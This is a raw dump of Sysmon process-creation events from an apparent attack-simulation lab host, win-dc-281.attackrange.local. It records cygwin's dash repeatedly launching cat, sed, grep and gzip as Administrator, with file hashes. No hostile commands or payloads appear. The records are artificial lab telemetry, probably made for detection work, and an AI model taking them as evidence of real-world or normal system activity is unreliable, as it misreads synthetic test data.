14:55:56.843{A8622C2F-53FC-6078-FA09-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.835{A8622C2F-53FC-6078-F909-00000000AE01}3008C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-F809-00000000AE01}5108C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.828{A8622C2F-53FC-6078-F809-00000000AE01}5108C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.819{A8622C2F-53FC-6078-F709-00000000AE01}4568C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-F509-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051063Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.811{A8622C2F-53FC-6078-F609-00000000AE01}5952C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-F309-00000000AE01}5396C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051061Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.811{A8622C2F-53FC-6078-F509-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.804{A8622C2F-53FC-6078-F409-00000000AE01}1844C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-F209-00000000AE01}7016C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051041Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.804{A8622C2F-53FC-6078-F309-00000000AE01}5396C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051029Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.797{A8622C2F-53FC-6078-F209-00000000AE01}7016C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051017Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.789{A8622C2F-53FC-6078-F109-00000000AE01}5412C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-F009-00000000AE01}5224C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051007Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.782{A8622C2F-53FC-6078-F009-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.773{A8622C2F-53FC-6078-EF09-00000000AE01}5964C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-ED09-00000000AE01}612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050977Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.766{A8622C2F-53FC-6078-EE09-00000000AE01}5444C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-EB09-00000000AE01}5220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050975Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.766{A8622C2F-53FC-6078-ED09-00000000AE01}612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050956Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.758{A8622C2F-53FC-6078-EC09-00000000AE01}6240C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-EA09-00000000AE01}5800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050955Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.758{A8622C2F-53FC-6078-EB09-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050943Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.751{A8622C2F-53FC-6078-EA09-00000000AE01}5800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.743{A8622C2F-53FC-6078-E909-00000000AE01}6672C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-E809-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050921Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.736{A8622C2F-53FC-6078-E809-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.728{A8622C2F-53FC-6078-E709-00000000AE01}5860C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-E509-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050890Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.719{A8622C2F-53FC-6078-E509-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050889Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.719{A8622C2F-53FC-6078-E609-00000000AE01}616C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-E309-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050871Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.711{A8622C2F-53FC-6078-E409-00000000AE01}5108C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-E209-00000000AE01}5184C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050869Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.711{A8622C2F-53FC-6078-E309-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050857Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.704{A8622C2F-53FC-6078-E209-00000000AE01}5184C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.691{A8622C2F-53FC-6078-E109-00000000AE01}5620C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-E009-00000000AE01}6268C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.684{A8622C2F-53FC-6078-E009-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050823Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.676{A8622C2F-53FC-6078-DF09-00000000AE01}1496C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-DD09-00000000AE01}7016C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050806Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.669{A8622C2F-53FC-6078-DE09-00000000AE01}5144C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-DB09-00000000AE01}5224C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050803Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.668{A8622C2F-53FC-6078-DD09-00000000AE01}7016C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.661{A8622C2F-53FC-6078-DC09-00000000AE01}6336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-DA09-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050783Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.661{A8622C2F-53FC-6078-DB09-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050770Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.654{A8622C2F-53FC-6078-DA09-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050758Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.646{A8622C2F-53FC-6078-D909-00000000AE01}5628C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-D809-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050748Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.639{A8622C2F-53FC-6078-D809-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.631{A8622C2F-53FC-6078-D709-00000000AE01}5212C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-D509-00000000AE01}5804C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050718Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.624{A8622C2F-53FC-6078-D609-00000000AE01}4160C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-D309-00000000AE01}5664C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050716Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.623{A8622C2F-53FC-6078-D509-00000000AE01}5804C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050697Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.616{A8622C2F-53FC-6078-D409-00000000AE01}5860C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-D209-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.616{A8622C2F-53FC-6078-D309-00000000AE01}5664C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050684Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.609{A8622C2F-53FC-6078-D209-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050672Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.602{A8622C2F-53FC-6078-D109-00000000AE01}6448C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-D009-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050662Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 